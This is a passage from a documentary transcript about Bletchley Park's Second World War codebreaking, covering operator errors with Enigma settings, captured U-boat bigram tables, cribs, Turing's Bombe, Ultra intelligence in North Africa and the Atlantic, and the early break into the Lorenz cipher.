Well , they 'd bombed us , they'd - every day , every night - with Heinkels and Dorniers .
They 'd killed a lot of people in London and in the cities , you could n't have any pity for Germans under those circumstances .
WINSTON CHURCHILL [ voice over ] :
What a triumph the life of these battered cities is over the worst that fire and bomb can do .
NARRATOR : During the grim months of the Blitz , Bletchley Park was one of Churchill 's few glimmers of hope .
Access to the enemy 's innermost secrets could make the difference between victory and defeat .
The codebreakers were working around the clock to break the Enigma .
They had divided into huts to attack different parts of the German war machine .
Hut 6 was now concentrating on the Air Force Enigma .
NARRATOR : The Luftwaffe 's code , nicknamed RED , soon proved vulnerable .
Ironically , the German Air Force thought itself so technologically advanced that it was careless about security .
For months , Bletchley Park had tried to crack the secret messages from German airfields to their headquarters in Berlin .
They had to find a way - and quickly .
Hitler was preparing to invade Britain .
JOHN HERIVEL :
It was like looking for something in a dark room , one did n't really know what one was looking for , and I thought and I thought .
But I had great confidence , I felt , I am going to find some way to break back into the RED .
NARRATOR : John Herivel turned his thoughts to the Enigma operator .
There were set procedures to be carried out to prepare each Enigma for that day 's messages .
The settings of the rotors and the Ringstellung - the alphabet ring around the rotors - were crucial .
If the secret instructions were not followed exactly , the security of the whole system would be at risk .
But John Herivel discovered that the operators were making a fatal mistake .
It became known as the Herivel tip .
TONY SALE :
What the operator should do , of course , is when they 've done a setting on a cipher machine , you should always spin the wheels so that it randomizes the position .
But the whole of the Herivel tip depended on the German operator either being under pressure or lazy and not doing that .
NARRATOR : The operator had to send the three random letters by Morse to the person at the other end so that both machines would be set to the same start position .
But Herivel realized that if the operator failed to spin his rotors as he should , then the three letters he was sending over the airwaves - uncoded - would be the secret ring setting .
Instructions were quickly sent out to the Y Stations to pay particular attention to the first messages they intercepted each day .
That 's when the mistake would show up .
Hut 6 studied the opening letter groups of the intercepts as fast as they arrived to see if the Herivel tip would work .
Sometimes the operator made only a half - hearted attempt to spin the rotors .
So LWZ would become LYB - just a click or two away - or perhaps LUX .
But as the codebreakers plotted out each letter group , they would begin to see clusters of letters that revealed the original secret setting .
Herivel 's tip was working .
At last , they had a way to break Luftwaffe RED .
The codebreakers could now give the RAF vital information about how the Luftwaffe was organized and what it was planning - even if they did n't always know the details .
PETER CALVOCORESSI :
You do n't get a message saying , we are going to do the following great things in the next six months of the year , signed Hitler .
Nothing like that at all , you do n't get anything on a plate .
There was a case of an intercept which consisted entirely of figures , random figures , and someone says , I wonder if they are coordinates on a map , and they all turned out to be airfields .
You did in fact get from that that they were readying and building up airfields , because they were going to concentrate their forces on attacking Britain .
Hut 6 broke the Air Force Enigma every day until the end of the war .
And they kept discovering new types of careless mistakes by the German operators that gave them away .
To avoid interception , the Germans had to disguise each message setting .
They thought they had found the perfect solution : use the Enigma itself to conceal the setting .
The operator had already been told to think up three random letters for the initial rotor setting .
Now he was told to think up three more , and type them into the Enigma .
They would be the key for that particular message , and since they were being encoded , they could be transmitted in complete safety .
ARTHUR J. LEVENSON :
On the surface it looks like a foolproof indicator system , the true setting of the message is hidden .
However , the weakness was leaving the selection of the three letters to the operator at random , and human beings simply are not random .
NARRATOR : Hut 6 soon saw connections between the two sets of supposedly random letters .
Once they got the first three letters which were sent in plain text , they could often guess the second three , which were in code .
One operator called Walter became legendary at Bletchley Park .
Every day he would set his rotors to the first three letters of his name and then type in the first three letters of his girlfriend 's name , Klara .
LEVENSON : One wonderful one : the outside indicator was TOM , and we thought oh , tom - tom , and we thought that , that did n't work .
It was TOM MIX , the American cowboy actor from the 1920s , I do n't know , I did n't know in Germany anybody knew who Tom Mix was , but apparently he had a following in Germany .
NARRATOR : HIT was almost invariably followed by LER .
Even Hitler was helping to break the Enigma .
TONY SALE :
They were given the manuals , they were told exactly what to do and how to use the machine , but part of the problem was this myth that the Enigma machine was completely unbreakable .
And this was buried deep in the German psyche , so therefore they thought why bother , you know , nobody can break these messages if we use these keys because they 're easy .
ARTHUR J. LEVENSON :
If you saw LON as the first three , it was almost certain that DON was the second .
MAD was RID , BER was LIN .
MAVIS LEVER :
In the heat of battle you 'd put up dirty words , and I am the world expert on dirty German words .
The worst message I ever had come near me was one from the German high command to someone in Abwehr , the German Intelligence , reprimanding them for using these words because , did they not know that young girls were having to decode them ?
And of course a young girl at Bletchley was devastated because they were - however , they went on doing it , I might say , never mind the reprimand , but it was nice to think the Germans had that side of them that they would think that perhaps they ought n't to use dirty words in their encodements .
NARRATOR : Despite its success in breaking the Luftwaffe RED code , Bletchley Park had got nowhere with the Enigma of the German Navy - and it was the Navy that was now the problem .
By the spring of 1941 , German U - boats were wreaking havoc in the Battle of the Atlantic .
Every merchant ship sunk deprived Britain of the supplies it needed to survive .
Slow - moving convoys of merchant ships regularly crossed the Atlantic to and from America .
The United States had not yet entered the war but the convoys supplied half of Britain 's food and all of its oil .
Although protected by escorts , its convoys were still easy targets for the German U - boats .
Hitler had ordered Admiral Karl Donitz to destroy Britain 's lifeline .
SIR ROBERT ATKINSON :
It was Donitz who realized quite early on that he could defeat the Allies by bringing England to its knees by starving us , if he could break that North Atlantic route then there could be no food , fuel , troops , munitions come to this country and he could win that war by U - boats , and he nearly succeeded .
H.J. KRUG : Donitz tried to build up a kind of elite spirit and everybody was proud to take part in that and we were very eager to join that force , and of course we had been brought up to adore taking risks in the National Socialist period when we were boys .
So we were not really aware of the risk .
NARRATOR : Donitz built giant fortified U - boat pens on the French coast .
From here his U - boats could strike out into the Atlantic .
To attack the convoys , Donitz organized his U - boats into hunting groups or wolf packs , operating along specific patrol lines .
As the slow moving convoys crossed the Atlantic , wolf packs of 30 or more U - boats would lie in wait .
SIR ROBERT ATKINSON : Almost every convoy there would be losses .
They were very crafty , these German U - boat commanders .
They would anticipate our route and submerge in daylight just ahead of the convoy and let the convoy pass over them and torpedo right , left and center and we would n't know where the attack had come from .
NARRATOR : Donitz controlled the wolf packs by radio messages encoded in the naval Enigma .
Breaking it was to be the biggest challenge faced by Bletchley Park .
If they failed , the Battle of the Atlantic - and the war - could be lost .
One mind held the key to breaking the Enigma , and it belonged to Alan Turing .
PETER HILTON : Alan Turing was unique , I mean he was a genius , and what you realize when you get to know a genius well is that there 's all the difference between a very intelligent person and a genius .
With very intelligent people , you talk to them , they come out with an idea , and you say to yourself , if not to them , I could have had that idea .
You never had this feeling with Turing at all .
He constantly surprised you with the originality of his thinking , it was marvelous .
NARRATOR : Soon after becoming a research fellow at Cambridge at only 22 , Alan Turing invented the first basic concept of a computing machine .
Bletchley Park suited both his genius and his eccentricity .
ANDREW HODGES : He had funny manners .
He did n't like wearing a tie , he always looked untidy , but he quite liked being out in the country where he cycled around , he cycled with a gas mask on during hay fever period .
He did n't care what he looked like , he just thought that doing the job was what mattered .
SARAH BARING :
He was very shy of women , particularly girls .
I do n't think he'd ever met any girls before .
I did once offer him a cup of tea and he shrank back as if he was going to be shot .
And he used to , bless his heart , walk down to the canteen in a curious sideways motion , with his head down .
But he was such a star , we all thought he was the best , wonderful thing .
NARRATOR : Alan Turing set himself the challenge of cracking the Enigma .
In an attic room at Bletchley Park , Turing began studying the U - boat messages .
All he had to go on were the scrambled letters .
In an astonishing feat of deduction , Turing discovered exactly how the Germans were hiding the crucial message setting .
Unlike the Luftwaffe , the German Navy was leaving nothing to chance .
Instead of letting the operator choose three letters at random for his message setting , he had to get them from a list .
Although Turing had no information about the naval procedures , he managed to identify exactly how they selected their daily keys from a set of secret tables .
Instead of replacing one letter with another , these so - called bigram tables substituted pairs of letters .
UNIDENTIFIED MAN :
These codes were printed on rose paper in a ink that would immediately fade out if it got wet , so our orders were , in case of any difficulty , immediately to throw this material overboard or at least soak it in water so it could not be read .
NARRATOR : Brilliant as Turing 's deduction was , it was useless without the secret bigram tables , and those were on board the U - boats .
Then came an amazing stroke of luck .
Captain Fritz Julius Lemp was a hero of the Third Reich .
His U - boat , the U - 110 , had sunk the first ship in the war .
In April1941 , he set out on what was to be his last mission .
David Balme had just turned 20 .
He was an officer on H.M.S. Bulldog , which was escorting a convoy from Liverpool bound for America .
DAVID BALME :
We were south of Iceland and we knew we were being shadowed , you 'd get the reports back from the admiralty - from the admiralty , you 're being shadowed by U - boats .
And we always knew we'd be attacked in this area .
Suddenly two ships were torpedoed , one after another .
It was obvious where the attack come from , and the Corvette Aubretia made a very accurate attack on the U - boat , must have got the depth charges at just the right depth .
NARRATOR : Georg Hogel was the Enigma operator on U - 110 .
He had been with Captain Lemp throughout the war .
GEORG HOGEL [ voice over translation ] :
The light went out and we found ourselves sitting in the dark .
Only the emergency lights came on .
We then tried to restore power and check for water leaks .
DAVID BALME :
It was a classic attack , depth charges underneath the U - boat , blew it to the surface .
It was the dream of every escort vessel to see a U - boat blown to the surface , because usually they just sink when you do have a successful attack and go down to the bottom .
NARRATOR : This was just the chance that Turing and Bletchley Park had been waiting for .
On board the U - 110 were the secret bigram tables .
GEORG HOGEL [ voice over translation ] : Down below we had no idea what was going on above us .
But the commander on the bridge kept shouting , " get out , get out ! "
We asked , " what shall we do with the secret papers ? "
The order came back to leave everything and simply try to get out .
I do n't know - but we can't be blamed for following orders .
You can't imagine what it was like if you were n't there .
NARRATOR : The Germans abandoned ship , leaving the code books behind .
But Georg Hogel had one precious document he had to rescue - a book of love poems to his girlfriend .
GEORG HOGEL [ voice over translation ] : I went back down and grabbed the key to the place where the books were kept .
I got my book out and tried to put it in my pocket .
But it did n't fit , it was too big .
So I unbuttoned my shirt and shoved it in there .
It lay against my chest and that 's how I swam for half an hour .
NARRATOR : David Balme led a boarding party across to the stricken submarine .
Fearing that the Germans had left men behind to scuttle the boat , Balme went aboard first .
DAVID BALME : One could n't imagine the Germans would have abandoned this U - boat floating in the Atlantic without someone down below trying to sink her .
At any rate I got on , got my revolver out - secondary lighting , a dim blue lighting , was on and I could n't see anybody , just a nasty hissing noise which I did n't like the sound of .
To this day I do n't know what it was .
NARRATOR : The rest of the boarding party began to search the U - boat .
They had no idea what they were looking for .
They did not know about the secret bigram tables .
David Balme had never heard of Bletchley Park .
DAVID BALME : I sat down at the captain 's desk in his cabin , and suddenly amongst all the things , I think his iron cross was there and I put that into a bag and various odds and ends , but also I came across a sealed envelope , I did n't open it , would n't have understood at any rate , being I 'm not speaking German , but it obviously was something fairly important , being a sealed envelope in his desk , so I popped it into my pocket .
NARRATOR : Little did David Balme realize that the envelope in his pocket would transform the intelligence battle against the U - boats .
It contained procedural handbooks , a U - boat navigational chart , and the vital bigram tables .
These documents gave Bletchley Park a major leap forward in decoding .
Captain Lemp died in the attack .
No one will ever know why he did not scuttle the U - boat or destroy the codes .
GEORG HOGEL [ voice over translation ] :
You can't change things in retrospect .
I had to leave because those were the orders .
And the unequivocal order was to leave everything behind and go up and climb onto the deck .
There was no other way .
NARRATOR : The only document on the U - 110 that did not end up in British hands was the book of love poems to Edith .
The papers that were captured , including the bigram tables , were priceless .
When the documents reached Bletchley Park , the codebreakers rejoiced .
The tables and charts would lead to a drastic improvement in fixing U - boat positions , so convoys could be routed evasively around the wolf packs .
VALERIE EMERY :
The prize were the bigram tables and they were magnificent , although some of them had got a bit wet and we had to dry them .
Geoffrey Tandy , having been at the Natural History Museum , had access to proper drying paper which he brought down by a load , and we had to dry those and clean them up and distribute them as necessary .
NARRATOR : Almost immediately the results were evident .
On June 23rd , 1941 , Bletchley Park decoded a U - boat message that would save a convoy .
It was heading for England laden with supplies , and the codebreakers discovered that a wolf pack of 10 U - boats was lying in wait .
Armed with this knowledge , the Admiralty could reroute the convoy and set up a counter attack .
The attack lasted five days ; two of the U - boats were sunk and the convoy arrived safely .
The Allies had a formidable new weapon in the Battle of the Atlantic .
But the war was far from over .
Frustrated in his attempts to crush Britain , Hitler now dreamed of conquest in the east .
In the spring of 1941 , decoded Enigma messages hinted at preparations for a massive invasion of Russia .
Once the invasion was under way , Bletchley Park began decoding other , more alarming messages .
As the German troops advanced , the SS and police sent signals reporting their mass killings of Soviet Jews .
Although no one anticipated the full scale of the genocide , this is now known to be the opening chapter of the Holocaust .
When Churchill saw the decodes amidst other evidence , he wanted the whole country to share his outrage .
WINSTON CHURCHILL [ archive , radio speech ] : Since the Mongol invasions of Europe in the 16th century , there has never been methodical , merciless butchery on such a scale .
We are in the presence of a crime without a name .
NARRATOR : Churchill was taking a chance that the Germans would realize their codes had been broken , exposing the work of Bletchley Park .
It was a huge gamble .
In fact , the head of the order police was suspicious and ordered new restrictions on the sending of reports on the mass killings by radio .
Luckily for Bletchley Park , the German high command never lost its faith in the Enigma .
But to avoid further risk of exposure , security was tightened and all information resulting from Bletchley Park decodes bore the top secret rating , code word Ultra .
PETER CALVOCORESSI : The Germans did n't attach much importance to intelligence at the beginning .
You do n't if you 're winning .
They attached importance to the Blitzkrieg and winning the war quickly .
We attached great importance to intelligence because we had our backs to the wall and we had nothing else that we could rely on .
NARRATOR : By the summer of 1941 , Bletchley Park was able to crack the naval Enigma in less than two days , due partly to the U - boat documents and partly because they had learned to exploit a crucial weakness of the Enigma machine .
When an operator typed a message on the Enigma , the machine would replace every letter with a different one .
The letter typed in never came out the same .
This was yet another basic flaw in the Enigma that could be exploited .
The simple fact that no coded letter could ever be the original letter was vital to the codebreakers in their quest to unravel the messages .
As they studied the intercepts , it became clear that the Germans kept repeating certain set phrases .
It was soon possible to predict which message contained a particular phrase .
Bletchley Park called these phrases " cribs . "
PETER HILTON : I remember " Nieder mit die Englander , " down with the English .
And of course " Heil , Hitler . "
" Heil , Hitler " was enormously valuable , I mean you should never inculcate in your military , anyway , the tendency to have exactly the same phrase opening every statement of a great victory .
NARRATOR : As military bureaucracy settled into routine , the Germans often sent the same message at the same time every day .
NIGEL FORWARD :
There was one remarkable one which we used to , used sometimes to cheer us up as a sort college yell , because it had such a wonderful rhythm .
It went as follows : nicht und fliebar , nicht auf Gebaude , gift zu Dusseldorf , puffel swoll , " and you can imagine six or seven adults who had nothing better to do on the night shift reciting this and feeling a lot better afterwards , perhaps two or three times in some cases .
I mean , that message in itself was pointless .
All it said was , " you cannot fly from this place , no building has taken place , signed off , whatever . "
It would have been much better if they had n't sent it , from their point of view .
It was simply the way into the code .
NARRATOR : When they suspected the presence of a set phrase , the codebreakers then searched for it in a message .
Finding the correct position for the crib relied on the flaw in the Enigma .
The codebreakers lined their crib up against the coded message .
Since they knew the Enigma would never duplicate a letter in the original , if any pairs of letters did match , the phrase must be in the wrong position .
They slid the crib along the message until they found a point where none of the letters were the same .
This could be where the phrase was located .
If successful , they could then work out the Enigma settings for the next 24 hours .
The codebreakers became so adept , they would create their own cribs .
They would ask the RAF to drop mines in a specific stretch of sea .
The Germans would immediately send a message giving a grid reference for the mines .
The codebreakers knew the grid reference CF97 would be spelled out in the coded German message .
So they used " caesar fritz nein sieben " as the crib to find the Enigma key .
Bletchley Park called this gardening .
By now the codebreakers were not merely learning about the Enigma , but about the whole system of war communication .
Could the new intelligence have an impact on an entire military campaign ?
The test came in the deserts of North Africa .
A new German general was making a name for himself with his aggressive attacks on the British : Erwin Rommel .
MANFRED ROMMEL :
My father was what you could call a warrior , he was more a soldier 's general , not a paper general .
He was very lucky in Africa , not having been wounded , except one day when a British splinter from a shell hit his belt , but the splinter was sticking in the belt and not in his body .
Throughout 1941 the desert war swung back and forth across Libya as the Germans tried to capture North Africa .
With only radio for communications , Rommel 's North African campaign depended on the Enigma .
MANFRED ROMMEL :
My father had never an idea that the German code was broken .
He could not imagine that something like this could happen .
NARRATOR : But Rommel 's strategy had one major weakness .
He relied totally on the Italians to bring in supplies .
Rommel 's supply lines were a natural target for the British .
The RAF was able to attack Italian convoys crossing the Mediterranean to Rommel because the codebreakers could read both the German Luftwaffe Enigma and the Italian special machine cipher .
PETER HILTON : I could not understand how Rommel failed to realize that we were breaking important signals .
I mean , he was a superb general , he was winning , but then he started losing because his supplies were always sunk in the Mediterranean .
NARRATOR : Bletchley Park could pinpoint the location of enemy oil tankers and even know how much gasoline they were carrying .
But to keep Ultra safe , it had to look as though the British knew about the convoys from some other source .
RALPH BENNETT :
There was an absolutely rigid rule that we could not use Ultra unless first of all an aircraft had been sent out to reconnoiter .
Once the Ultra had been proven by the Germans seeing a British airplane looking at the convoy , then you could use it , but not until .
They might very well say , " I wonder how they knew it , " but fortunately they always deluded themselves by saying it must have been an Italian traitor in the Naples docks .
MANFRED ROMMEL :
My father ended his life with the suspicion that there was a gap in the Italian high command through which news escaped and arrived at the British side .
But in heaven he must apologize towards the Italians and say , " I was wrong . "
NARRATOR : But in the game of intelligence , the Allies had losses as well as gains .
Although the German secret service never cracked an Allied cipher machine , Rommel did obtain vital inside information from a spy .
The incident began earlier in 1941 when a group of American codebreakers visited Bletchley Park .
With America not yet officially at war , the secret services on both sides were nervous about collaborating .
CARL BOYD : Spies are not prone to share a great deal straight away , you know .
They - it takes time for spies to warm up with one another , and even British and American spies , they played their cards very close to their chests .
NARRATOR : Although the British worried about the possibility of American security leaks , they began sharing decoded Enigma messages and diplomatic reports about the war .
British security fears were justified , for these exchanges soon gave Rommel his own intelligence breakthrough .
Reports on the British campaign in North Africa were sent regularly to Washington by the U.S. military attaché in Cairo .
The Germans intercepted the messages , but could n't break the diplomatic code .
Then , in September 1941 , the Italian secret service broke into the U.S. embassy in Rome and stole the code book used to encipher all U.S. diplomatic messages .
The thieves copied the code book and returned it to the safe without anyone knowing .
Now Rommel could read all embassy transmissions about the British campaign .
Armed with information about British troops and tanks , Rommel launched a bold assault through Libya , pushing the British back 300 miles in 17 days .
The news that reached Churchill painted a grim picture of defeat .
Now the British needed their own intelligence coup to reverse the disaster .
At Bletchley Park , the codebreakers raced to crack the daily rotor settings .
Some breaks came in only six to 12 hours .
Still , lives might be saved if the operation could be speeded up .
The gifted codebreaker Alan Turing had long been intrigued by the idea of building machines to automate the codebreaking process .
The Poles had built such a device before the war , but Turing set out to improve on their ideas .
Turing 's goal was to build a machine that could figure out how the German operators had set up their Enigmas for that day 's messages .
Using stock phrases , or cribs , to deduce the rotor settings was the most time - consuming part of the whole codebreaking process .
ANDREW HODGES : Alan Turing 's great breakthrough was seeing - that finding out the rotor settings from that crib was something that could be done by a machine , that was the great starting point and brought the whole thing into the modern age .
NARRATOR : Turing 's machine was vastly more powerful than the Poles ' earlier device .
Curiously , Bletchley Park called it the Bomb , perhaps because of the ticking noise it made while operating .
ARTHUR J. LEVENSON : An average Bomb run was about 15 minutes .
Occasionally I heard we beat the Germans to the decryption .
This happened when A would send B a message and B would almost immediately send back a message , a very short message , which just said , " I ca n't read you . "
We would get the solution faster than the other guy could decipher the second sending .
And if it was something hot , it'd get out in the field before the German commander got his .
NARRATOR : The Bomb was an array of electromechanical drums that simulated the rotors of the Enigma machines .
The drums clicked round letter by letter , testing the thousands of possible Enigma settings - 20 every second - until the correct one had been found .
TONY SALE : Before Turing , the perceived wisdom was , you 've just got to go around searching for this one solution which will break a particular message .
Turing said no , what you do is you use the mathematical technique of rejecting all things that it could n't possibly be .
So it was a very powerful search engine , but working in a negative sense in that it rejected millions and millions of possibilities very , very quickly and arrived at the correct answer .
NARRATOR : The Bombs radically sped up the pace of decoding .
By the end of the war there were 200 of the devices at six different locations , enabling Bletchley Park to decode 90,000 messages a month .
ANDREW HODGES :
The algorithmic process , as we call it now , by which the crib and the cipher text were processed on these mechanical systems , they were the most advanced , most complex processes that had ever been used in the history of the world .
I can't think of anything else with its logical and statistical sophistication .
It 's something you should think of as years and years before its time .
NARRATOR : Meanwhile , in August 1942 , Churchill traveled to North Africa , determined to reverse the Allies ' fortunes .
His first action was to inject fresh blood into the leadership of the 8th Army .
He appointed a decisive new general , Bernard Montgomery , to take on Rommel 's Africakorps .
He knew from Ultra that Rommel was prepared to attack somewhere in Egypt - but where ?
Montgomery predicted the ridge at Alam Halfa .
RALPH BENNETT : Monty said , looking at the ground , he will go over the Alam Halfa ridge .
Some days later we decoded a signal from Rommel saying , I am going to attack on the 30th of September the Alam Halfa ridge , which is exactly what Monty had said .
I think from that moment on Monty was so confident of his own intelligence that he could n't be beaten , he could n't - he knew everything .
NARRATOR : But Montgomery had another advantage .
The Allies finally realized that the Germans were reading U.S. embassy reports on the British campaign , so the embassy changed its diplomatic code .
Rommel no longer knew what the enemy was planning .
Montgomery was still receiving Ultra from Bletchley Park .
Soon , the German forces were under enormous pressure .
But some of the decoders began to feel impatient with Montgomery .
PETER HILTON :
We felt that Montgomery did not trust the intelligence information that Bletchley Park was providing him with , because we believed in our own arrogant way that we were probably providing a service to the military that no other military had ever had in the history of warfare .
NARRATOR : On the 23rd of October , the British launched its attack at El Alamein .
ARCHIVE RADIO : Our mandate from the Prime Minister is to destroy the Axis forces in North Africa .
We 're going to finish with this chap Rommel once and for all .
NARRATOR : British intercept stations logged over 300 messages a day in the battle that followed .
Bletchley Park knew Rommel 's plans , his forces , and his losses .
For the first time in the war , an army moved into battle with precise advance knowledge of the enemy .
Ultra told Montgomery of Rommel 's critical shortages of fuel and tanks .
On the evening of the 2nd of November , Rommel signaled Hitler for permission to retreat .
JOHN PRESTWICH : Alamein was marvelous , because you had these desperate messages from Rommel saying , Panzer Army is exhausted , we 've enough petrol for 50 kilometers , ammunition is contemptible , and so on , and we have between 11 and 17 operational tanks in the whole of Panzer Army Africa .
NARRATOR : Hitler replied the next day , ordering Rommel not to yield a step , either victory or death .
Montgomery read the message within hours .
At El Alamein Montgomery 's superior forces crushed Rommel .
Yet he decided not to pursue the remnants of the retreating German Army .
RALPH BENNETT : We told Monty over and over again how few tanks Rommel had got .
So Monty could have wiped Rommel off the face of the earth .
Why he did n't do so , why he did n't wipe it off the face of the earth , I simply do not know , nobody else knows .
JOHN PRESTWICH : Why was the Hut 3 information not used ?
It was so full , I mean that was our exasperation .
We were giving Monty every conceivable information about the state of Rommel 's troops , the number of operational tanks , which was terribly crucial .
I mean , you know , enough - about as many tanks as could be parked on the lawn at the back of this house .
In desert warfare , no tanks and you 're finished .
RADIO ARCHIVE : This is the BBC Home and Forces program .
Here 's some excellent news which has come during the past hour from GHQ Cairo .
It says , the Axis forces in the western desert after 12 days and nights of ceaseless attacks by our land and air forces are now in full retreat .
BARBARA QUIRK : " Somehow war seems the natural state of affairs , and peace when it comes will take a hell of a lot of getting used to . "
NARRATOR : At the time of El Alamein , the U.S. had been at war with Germany for nearly a year .
Even before Pearl Harbor , the British Admiralty had been passing decoded U - boat messages to the American Navy .
Churchill and Roosevelt knew that the Battle of the Atlantic was crucial and that Ultra gave them a vital edge in the fight against the U - boats .
In February 1942 , the Admiralty received disastrous news .
An abrupt change in the U - boat code plunged Bletchley Park into darkness .
They could no longer read the U - boat signals .
Equally serious was an abrupt change in U - boat tactics .
German submarines switched from the North Atlantic and began prowling the eastern seaboard of the U.S.
There , the marauding U - boats maintained radio silence .
When they did transmit , their signals could n't be decoded .
All over the Atlantic , the Allied navies struggled to cope with mounting losses at sea .
As the crisis deepened , the naval Enigma team at Bletchley Park worked round the clock to crack the new code , which they called Shark .
Since none of the old codebreaking tricks would work , it was obvious that Donitz had somehow drastically changed the Enigma .
For the Allies on both sides of the Atlantic , it was a severe blow .
COLIN BURKE : Well , unfortunately the British lost control of the Enigma , and America was left without the kind of vital information needed to protect its convoys .
There were an awful lot of protests , and England was very hesitant to tell us that they had lost control of the code .
NARRATOR : Before the blackout , the Admiralty 's submarine tracking room had been able to pinpoint U - boats with the help of the navigational positions radioed between Donitz and his crews .
Now all they had were rough directional fixes on the signals themselves .
Toward the end of 1942 , the Allies were losing ships at over four times the rate before the blackout .
Finally Bletchley Park figured out what Donitz had done .
Though still believing the Allies could never crack Enigma , he was worried about internal security , and ordered the addition of a fourth rotor to the machine .
The revolving rotors , with their maze of constantly changing electrical wiring , were the secret of the Enigma .
Introducing a fourth one vastly multiplied the number of potential settings .
Now the codebreakers would have to build a new type of device to simulate the four - rotor Enigma , and pacify the increasingly impatient Americans .
COLIN BURKE :
It got to the point where by mid-1942 the Americans declared that no matter what , they would go their own way and make sure they'd get their own independent capability against the German submarine menace and its code systems .
And it became quite touchy as to whether or not the two sides would cooperate .
NARRATOR : Tensions grew when secrets were withheld from an American intelligence officer visiting Bletchley Park .
He wrote an angry report home .
To resolve the crisis , Bletchley Park 's second - in - command traveled to Washington for a meeting with the U.S. Navy .
They signed an agreement to resolve concerns about security and to cooperate fully on the breaking of the naval Enigma .
As part of the deal , American codebreakers would be sent to Bletchley Park .
Together they would take on the challenge of the fourth rotor .
SARAH BARING :
What I think bothered us most was the destruction of the merchant shipping and the destruction of the naval ships , and knowing that if only we could break this wretched code , we could save so many lives and sink so many U - boats .
NARRATOR : The first chance to get back into the naval Enigma came when a fresh set of captured U - boat code tables arrived at Bletchley Park , enabling the codebreakers to uncover a critical weakness in the four - rotor system .
The German four - rotor Enigma used mainly on submarines had to communicate with other naval stations that used only a three - wheel machine .
To solve the problem , the fourth rotor could be set in a special position that allowed the machine to simulate an old fashioned three - rotor Enigma .
With the help of the captured tables , the codebreakers worked out the settings of the first three rotors on the Bombs as they had in the past , then simply ran through all 26 positions of the fourth rotor until they found the right one .
Soon , the daily settings were on their way to the Admiralty and America .
After 10 months in the cold , Bletchley Park was back .
SHAUN WYLIE :
The excitement when we got back into the U - boats was terrific .
I was on night shift and somebody came running and said , " We 're back into the U - boats , " and it was the one that meant we were going to be able to go on getting into the U - boats so that was terrific .
It was n't just a one off , it was - we were going to be able to do it steadily .
Churchill was told as soon as possible .
It was a great moment .
NARRATOR : Once again Bletchley Park could help reroute convoys around the Wolf Packs .
Airborne radar and improved escort support helped assure victory in the Battle of the Atlantic .
Although only a few of the men and women of Bletchley Park were in a position to appreciate it , the breaking of the naval Enigma was their finest hour .
By the spring of 1943 , they were decoding dozens of messages a day , and cooperation with the Americans was taken to a new level .
The U.S. codebreaking unit was known as Arlington Hall , after its headquarters in northern Virginia .
After the war , it would become the National Security Agency , or NSA .
Here the first American officers were selected to join the codebreakers at Bletchley Park .
WILLIAM BUNDY : I remember vividly , a group of us were convened in a room there , and the moment we came in they were told , " What you 're going to hear today is something you will not discuss , and it means that you will never be put where you can be captured by the enemy . "
And I was picked to be the commanding officer of that outfit , and that 's how I got to Bletchley Park .
NARRATOR : During their voyage to England , the officers were ordered to tell a bizarre cover story , that they were messenger pigeon experts in the signal corps .
This aroused the suspicions of an officer who was checking their identity .
ARTHUR J. LEVENSON :
They asked us whether we'd had the Army general classification test , they said they could n't find our scores on our records .
They said , would you mind taking the test , and we said no , we do n't mind .
There were five of us , and we took the test , and this sergeant graded them , and he came running up , he says , " Holy mackerel .
What scores !
You guys ought to be in intelligence ! "
I do n't think I 'd ever met an Englishman in my life until that point .
I had been full of stereotypes about the English , you know , they 're distant and have no sense of humor , and these were the most outgoing , wonderful people .
Fed us when it was quite a sacrifice , just enough screwballs to be real fun .
LORD BRIGGS :
It was the first time I 'd ever been involved in my life in any serious discussion , both either about war or politics with an American .
It was there that I learnt for the first time to drink tomato juice , it was the first experience I had with American coffee and American bacon , so that in a way America was introduced to me through this Bletchley prelude .
NARRATOR : The Americans quickly settled into life at Bletchley Park .
The only serious dispute arose when the British challenged the Americans to a game of rounders , the British version of baseball .
BARBARA EACHUS :
We said of course , we were delighted , you know , our honored allies .
So the Americans came and we showed them how they could play with - they said what , no baseball bat ?
We said no , we just use this broom handle .
So they said fine .
And we played .
It was a lovely day .
We all played well .
And at the end of the game , we all sort of clapped each other on the back and the Americans said well , " We 're sorry we beat you , " and the British captain said , " I 'm sorry we beat you . "
And that was a little bit of an incident , because the Americans said they thought they 'd won , and we said we knew we 'd won .
And they said , " Well what rules do you play by ? "
And we said , " Our rules . "
NARRATOR : As the Americans adapted to their new life , their colleagues told them about a mysterious and daunting codebreaking problem .
They knew that in addition to Enigma , the Germans sometimes used another completely different kind of cipher machine .
TONY SALE : Now we knew nothing about this cipher machine , it was kept completely secret by the Germans , and we first began to intercept radio transmissions in 1940 .
It was actually a group of policemen on the south coast of England .
They were listening for German agent transmissions from within the U.K .
Of course there were n't any because we 'd captured all the agents , but they were still listening for these and they heard these weird signals .
And they sent them to Bletchley Park .
NARRATOR : At first , the decoders puzzled over the origin of the strange signals .
Hitler had demanded a cipher machine for the German high command that was faster and even more secure than the Enigma .
His experts devised a coding system based on the teleprinter machine .
Teleprinters operated on a simple , universal binary code that was widely known .
But the Germans connected the teleprinter to a machine that cunningly exploited the teleprinter language itself to produce a complex code .
The secret German coding machine was called the Lorenz .
To scramble a message the Lorenz used 12 rotors - not just the three or four of the Enigma .
DONALD MICHIE : The Lorenz machine transmits a string of letters , each one of which is actually a mix of the real letter of the real message and a piece of machine crafted gobbledygook , that machine being of diabolically complex craftiness .
So at the end of it , what comes out and goes over the ether and is transmitted , is a single string of total gobbledygook .
NARRATOR : The Lorenz relied on a mathematical system called " modulo two addition . "
This allowed the string of meaningless letters added to the message at one end to be removed at the other by a similar math calculation .
TONY SALE :
The operator presses a key on his teleprinter , that generates an electrical signal , the Lorenz machine then adds an obscuring character to this signal and the result is then transmitted .
At the other end of the link another Lorenz machine set to exactly the same configuration regenerates exactly the same obscuring character , adds it back to the cipher text , and by the magic of modulo two arithmetic they cancel out and leave you with the plain text .
NARRATOR : The security of the Lorenz depended on the fact that it was adding a string of random letters to hide the real message .
TONY SALE :
But because it 's a machine , it can't generate a completely random set of letters .
It 's what 's known as pseudo random .
Unfortunately for the Germans it was more pseudo than random , and that 's how it was broken .
NARRATOR : Bletchley Park gave the mysterious code the name FISH .
They worked out that fish was based on teleprinter language .
How to strip off the obscuring code was anybody 's guess .
But on the 30th of August , 1941 , a lazy German operator gave the whole game away .
TONY SALE :
When he got to the end of keying in this nearly 4,000 character message by hand , the operator at the receiving end sent back in German the equivalent of , " Did n't get that , send it again . "
And then like idiots they both put their Lorenz cipher machines back to the same start position , and then he began to key this long message again .
NARRATOR : When the operator began to encode the same message a second time , he grew impatient and abbreviated parts of it .
